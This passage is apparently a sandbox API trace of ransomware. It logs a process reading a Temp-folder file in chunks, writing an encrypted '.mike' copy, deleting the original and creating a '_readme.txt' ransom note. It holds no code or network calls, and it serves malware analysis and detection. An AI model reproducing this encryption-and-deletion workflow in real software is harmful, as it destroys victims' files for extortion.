lpFilePart=0x0) returned 0x3 [0147.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0147.353] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), fInfoLevelId=0x0, lpFileInformation=0x227911c | out: lpFileInformation=0x227911c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5238480, ftCreationTime.dwHighDateTime=0x1d4d0ea, ftLastAccessTime.dwLowDateTime=0xfc1e30c0, ftLastAccessTime.dwHighDateTime=0x1d4cc1a, ftLastWriteTime.dwLowDateTime=0xfc1e30c0, ftLastWriteTime.dwHighDateTime=0x1d4cc1a, nFileSizeHigh=0x0, nFileSizeLow=0x71fa)) returned 1 [0147.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.355] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), fInfoLevelId=0x0, lpFileInformation=0x2279434 | out: lpFileInformation=0x2279434*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5238480, ftCreationTime.dwHighDateTime=0x1d4d0ea, ftLastAccessTime.dwLowDateTime=0xfc1e30c0, ftLastAccessTime.dwHighDateTime=0x1d4cc1a, ftLastWriteTime.dwLowDateTime=0xfc1e30c0, ftLastWriteTime.dwHighDateTime=0x1d4cc1a, nFileSizeHigh=0x0, nFileSizeLow=0x71fa)) returned 1 [0147.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0147.358] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0147.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.360] GetFileType (hFile=0x1d4) returned 0x1 [0147.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.360] GetFileType (hFile=0x1d4) returned 0x1 [0147.361] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.361] WriteFile (in: hFile=0x1d4, lpBuffer=0x227a280*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x227a280*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0147.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), fInfoLevelId=0x0, lpFileInformation=0x2279d80 | out: lpFileInformation=0x2279d80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5238480, ftCreationTime.dwHighDateTime=0x1d4d0ea, ftLastAccessTime.dwLowDateTime=0xfc1e30c0, ftLastAccessTime.dwHighDateTime=0x1d4cc1a, ftLastWriteTime.dwLowDateTime=0xfc1e30c0, ftLastWriteTime.dwHighDateTime=0x1d4cc1a, nFileSizeHigh=0x0, nFileSizeLow=0x71fa)) returned 1 [0147.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0147.364] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.365] GetFileType (hFile=0x1d4) returned 0x1 [0147.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.365] GetFileType (hFile=0x1d4) returned 0x1 [0147.365] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.365] ReadFile (in: hFile=0x1d4, lpBuffer=0x227b3b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x227b3b0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.368] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.369] GetFileType (hFile=0x1d4) returned 0x1 [0147.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.369] GetFileType (hFile=0x1d4) returned 0x1 [0147.369] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.370] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.371] GetFileType (hFile=0x1d4) returned 0x1 [0147.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.371] GetFileType (hFile=0x1d4) returned 0x1 [0147.371] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0147.372] ReadFile (in: hFile=0x1d4, lpBuffer=0x2288380, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2288380*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.373] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.374] GetFileType (hFile=0x1d4) returned 0x1 [0147.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.374] GetFileType (hFile=0x1d4) returned 0x1 [0147.374] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0147.375] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.376] GetFileType (hFile=0x1d4) returned 0x1 [0147.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.376] GetFileType (hFile=0x1d4) returned 0x1 [0147.376] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0147.377] ReadFile (in: hFile=0x1d4, lpBuffer=0x2295350, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2295350*, lpNumberOfBytesRead=0x2af080*=0x21fa, lpOverlapped=0x0) returned 1 [0147.378] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.378] GetFileType (hFile=0x1d4) returned 0x1 [0147.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.379] GetFileType (hFile=0x1d4) returned 0x1 [0147.379] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0147.379] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0147.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.380] GetFileType (hFile=0x1d4) returned 0x1 [0147.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0147.380] GetFileType (hFile=0x1d4) returned 0x1 [0147.381] WriteFile (in: hFile=0x1d4, lpBuffer=0x22a700c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22a700c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.383] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x211c92c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x211c92c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21215580, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x7420)) returned 1 [0147.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike", lpFilePart=0x0) returned 0x48 [0147.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.384] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x22a8708 | out: lpFileInformation=0x22a8708*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x211c92c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x211c92c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21215580, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x7420)) returned 1 [0147.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.385] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", dwFileAttributes=0x80) returned 1 [0147.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.385] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv")) returned 1 [0147.387] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0147.388] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.389] GetFileType (hFile=0x1d4) returned 0x1 [0147.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0147.389] GetFileType (hFile=0x1d4) returned 0x1 [0147.390] WriteFile (in: hFile=0x1d4, lpBuffer=0x22aa364*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x22aa364*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.391] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.391] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", 